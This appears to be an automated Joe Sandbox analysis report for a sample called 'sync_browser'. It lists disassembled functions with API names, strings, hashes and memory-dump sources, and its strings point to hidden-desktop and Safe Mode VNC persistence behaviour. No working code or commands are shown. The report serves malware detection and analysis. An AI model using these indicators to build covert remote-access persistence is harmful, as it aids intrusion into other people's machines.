                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Library$AddressFreeLoadProc
                                                                      • String ID: EnumDisplayDevicesA$USER32
                                                                      • API String ID: 145871493-2970514552
                                                                      • Opcode ID: c302339970f6293fc38423b47487169b7c7610065756fe4ae123da4c8d70ed68
                                                                      • Instruction ID: 057a18ba72ed369a9acf892488f1844176ed4e0d0fc733b90ca434a3c8759b4e
                                                                      • Opcode Fuzzy Hash: c302339970f6293fc38423b47487169b7c7610065756fe4ae123da4c8d70ed68
                                                                      • Instruction Fuzzy Hash: 39319731608B8A85E771EB25F4647A9A3A0FB99F94F940236EE9D83798DF3CD401C711
                                                                      Function 00007FF7E50C71D0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 68libraryloaderCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Library$AddressFreeLoadProc
                                                                      • String ID: EnumDisplayDevicesA$USER32
                                                                      • API String ID: 145871493-2970514552
                                                                      • Opcode ID: 20b902f79b4c6cb6d22b363d0868b8f0204c862da4352ce45faa7478bd25a1e0
                                                                      • Instruction ID: 07112a23c606112a00d77eb7a9ec19050dc34067e1f5422defd09be8e3c0fcff
                                                                      • Opcode Fuzzy Hash: 20b902f79b4c6cb6d22b363d0868b8f0204c862da4352ce45faa7478bd25a1e0
                                                                      • Instruction Fuzzy Hash: 8721A732B08B4941E760EF25F464766A3A4FB85B94F95013AEA5D83784DF3CD4018751
                                                                      Function 00007FF7E50767E0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 51registryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CloseOpenQueryValue
                                                                      • String ID: SOFTWARE\Microsoft\Windows NT\CurrentVersion$SubVersionNumber
                                                                      • API String ID: 3677997916-1834015684
                                                                      • Opcode ID: fb5cba2e797ba38d9a3dd7c8f4aa1b18ae4dee72e891ecdbfe1ae65bac5d5b43
                                                                      • Instruction ID: b990cc71c9d2e3e55d649303a5022bb90d02bb614dff0b742c2a43103033b966
                                                                      • Opcode Fuzzy Hash: fb5cba2e797ba38d9a3dd7c8f4aa1b18ae4dee72e891ecdbfe1ae65bac5d5b43
                                                                      • Instruction Fuzzy Hash: 2021A971A18B8681FB60EB20F46436AB364FF54F58F801136E64D47698EF3CD045C715
                                                                      Function 00007FF7E507A600 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 36libraryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Library$AddressCreateFreeInfoInitializeInstanceLoadParametersProcSystem
                                                                      • String ID: HideDesktop.cpp : Restorewallpaper %i$HideDesktop.cpp : Restorewallpaper %i %i$shell32.dll
                                                                      • API String ID: 3848869850-2975526927
                                                                      • Opcode ID: 86e18f80a34eacc762fd4aea0dba914ccb49a3b135e5f10d2f504f448b0c5f0f
                                                                      • Instruction ID: 447b8c5fde20799880c5aef7f3b882c626487b2b5239e4282f6ba900436c2893
                                                                      • Opcode Fuzzy Hash: 86e18f80a34eacc762fd4aea0dba914ccb49a3b135e5f10d2f504f448b0c5f0f
                                                                      • Instruction Fuzzy Hash: 4511F560A0954B92FA60BB24B8347B5A351AF90B44FC04437E50DD66A9DE3CA61AC773
                                                                      Function 00007FF7E5076D60 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 34registryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CloseOpenQueryValue
                                                                      • String ID: Installed$System\WPA\MediaCenter
                                                                      • API String ID: 3677997916-3461404619
                                                                      • Opcode ID: 554435a057f14dda37f7a57cb3d76111e403ad3072006c26abcf41054863a4ac
                                                                      • Instruction ID: 80e105d74657c904cc7bdcd1d529dfd42b902ef35a75e1ec027023f927f07438
                                                                      • Opcode Fuzzy Hash: 554435a057f14dda37f7a57cb3d76111e403ad3072006c26abcf41054863a4ac
                                                                      • Instruction Fuzzy Hash: BA019B71A28B8582EB509F21F45476AF764FB84B94F801132FA8E46B58EF3CD544CF11
                                                                      Function 00007FF7E507D790 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 34COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: PrivateProfileWrite$SectionStringwsprintf
                                                                      • String ID: Permissions$isWritable
                                                                      • API String ID: 4007284473-46173998
                                                                      • Opcode ID: 7f12bc1f13081b37d87251f9c01b571011c2547fbcf2e5f3b1996aca624bc9e1
                                                                      • Instruction ID: 14b87063af13bf9e32cd66b2675dfdff9c491660c94aecde1c4b3df35d97b694
                                                                      • Opcode Fuzzy Hash: 7f12bc1f13081b37d87251f9c01b571011c2547fbcf2e5f3b1996aca624bc9e1
                                                                      • Instruction Fuzzy Hash: BC017165A08B4B91EF10AB15F4612B5B321FF85F98FC02033D90D86258EE3CE145CB61
                                                                      Function 00007FF7E5083760 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 23registryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Delete_errno_invalid_parameter_noinfo_snprintf
                                                                      • String ID: Network$SYSTEM\CurrentControlSet\Control\SafeBoot\%s\%s$uvnc_service
                                                                      • API String ID: 1597899911-1199838351
                                                                      • Opcode ID: 446da7c11d9b0ffc6a81d4342d0f74e20c69771809681aa75ea43c0afc302851
                                                                      • Instruction ID: d4409f452a14a82113f39637805db7f5818d017300f1a5b1d7119030dcd26cdb
                                                                      • Opcode Fuzzy Hash: 446da7c11d9b0ffc6a81d4342d0f74e20c69771809681aa75ea43c0afc302851
                                                                      • Instruction Fuzzy Hash: 3EF09065A18B4A91EB10A724F4713BAA360FB44B48FC01237E64D837ACDF3CD105CB65
                                                                      Function 00007FF7E512929C Relevance: 7.7, APIs: 5, Instructions: 187COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: _amsg_exit_errno_getptd_invalid_parameter_noinfo
                                                                      • String ID:
                                                                      • API String ID: 1050512615-0
                                                                      • Opcode ID: 59d3a9a0c59e1ee59521e481f79702260e81d2ffae729b60c0b2a618ea284cda
                                                                      • Instruction ID: 5cb562de40607ad1effacb385e71e7e23b2f73e20701b22f31692e11dcbd033b
                                                                      • Opcode Fuzzy Hash: 59d3a9a0c59e1ee59521e481f79702260e81d2ffae729b60c0b2a618ea284cda
                                                                      • Instruction Fuzzy Hash: 0F71D513A0C3CA44F7516A31B57037CABA46B01F84F9A8433EE5E8669ECE3CD551C322
                                                                      Function 00007FF7E5135D3C Relevance: 7.6, APIs: 5, Instructions: 102COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ByteCharMultiWide$StringTypefreemalloc
                                                                      • String ID:
                                                                      • API String ID: 307345228-0
                                                                      • Opcode ID: 1b990316f8ee8c74eb84edbc338ace2982aad15001b0fddeae94aa45b172380f
                                                                      • Instruction ID: 89d5aabb508a7662022e887d9fd448b865ebe78645c51bb591260e44d886fa3e
                                                                      • Opcode Fuzzy Hash: 1b990316f8ee8c74eb84edbc338ace2982aad15001b0fddeae94aa45b172380f
                                                                      • Instruction Fuzzy Hash: 66419972A0474586EB20AF25A8203A9B3D5FF44FA4F9A4236DE1D877D8DF3CD4458311
                                                                      Function 00007FF7E5127A88 Relevance: 7.6, APIs: 5, Instructions: 72COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • DecodePointer.KERNEL32(?,?,00000000,00007FF7E5127B9D,?,?,?,?,00007FF7E51279F3), ref: 00007FF7E5127AB1
                                                                      • DecodePointer.KERNEL32(?,?,00000000,00007FF7E5127B9D,?,?,?,?,00007FF7E51279F3), ref: 00007FF7E5127AC1
                                                                        • Part of subcall function 00007FF7E5133480: _errno.LIBCMT ref: 00007FF7E5133489
                                                                        • Part of subcall function 00007FF7E5133480: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7E5133494
                                                                      • EncodePointer.KERNEL32(?,?,00000000,00007FF7E5127B9D,?,?,?,?,00007FF7E51279F3), ref: 00007FF7E5127B3F
                                                                        • Part of subcall function 00007FF7E5133370: realloc.LIBCMT ref: 00007FF7E513339B
                                                                        • Part of subcall function 00007FF7E5133370: Sleep.KERNEL32(?,?,00000000,00007FF7E5127B2F,?,?,00000000,00007FF7E5127B9D,?,?,?,?,00007FF7E51279F3), ref: 00007FF7E51333B7
                                                                      • EncodePointer.KERNEL32(?,?,00000000,00007FF7E5127B9D,?,?,?,?,00007FF7E51279F3), ref: 00007FF7E5127B4F
                                                                      • EncodePointer.KERNEL32(?,?,00000000,00007FF7E5127B9D,?,?,?,?,00007FF7E51279F3), ref: 00007FF7E5127B5C
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Pointer$Encode$Decode$Sleep_errno_invalid_parameter_noinforealloc
                                                                      • String ID:
                                                                      • API String ID: 1909145217-0
                                                                      • Opcode ID: 17a63d5b591e686c9ca2fe18f5a8febc498bada363ee497b58ea7ee50b63046d
                                                                      • Instruction ID: e2220bbc4a6a9402ccdf1271634bfa9a90e0770439d2d9f3acc3d385b6f8ae6f
                                                                      • Opcode Fuzzy Hash: 17a63d5b591e686c9ca2fe18f5a8febc498bada363ee497b58ea7ee50b63046d
                                                                      • Instruction Fuzzy Hash: B7217129B0A74A81EA10BB11F9B426AE251BF44FC0F944437DA0EC775DEE7CE484D326
                                                                      Function 00007FF7E509DAF0 Relevance: 7.6, APIs: 5, Instructions: 52COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CriticalDeleteSection$FreeLibrary
                                                                      • String ID:
                                                                      • API String ID: 3328731263-0
                                                                      • Opcode ID: 8efbe1f9ef3851a4ff4b1dc12ed94241d7363f7543c6192012ec118bd10c3970
                                                                      • Instruction ID: 77c9d45a09afbcf8fd326d6624643a78f7b28dc338abdcd7561a5f6a71f1a8bd
                                                                      • Opcode Fuzzy Hash: 8efbe1f9ef3851a4ff4b1dc12ed94241d7363f7543c6192012ec118bd10c3970
                                                                      • Instruction Fuzzy Hash: 0C213525709685A5DA58FB24E5B03F9E350FF81B50F844132D66D832A5DF3CA164C322
                                                                      Function 00007FF7E513A62C Relevance: 7.5, APIs: 5, Instructions: 39timethreadCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                      • String ID:
                                                                      • API String ID: 1445889803-0
                                                                      • Opcode ID: 5fd10cac5a6f9bb249cac31feee61d70b85b460cd106259e4606b4f7c020a879
                                                                      • Instruction ID: 977c35866d93ab935e2b59e04caa84d7a30ad5131aa3e4d5fa38f6d0a7c421e9
                                                                      • Opcode Fuzzy Hash: 5fd10cac5a6f9bb249cac31feee61d70b85b460cd106259e4606b4f7c020a879
                                                                      • Instruction Fuzzy Hash: 2101C421618A0D82E750BF25F860365B360FB09F91F847532DE5E877A8DE3CDC848711
                                                                      Function 00007FF7E5087A30 Relevance: 7.5, APIs: 5, Instructions: 32COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Event$CriticalInitializeSection
                                                                      • String ID:
                                                                      • API String ID: 4164307405-0
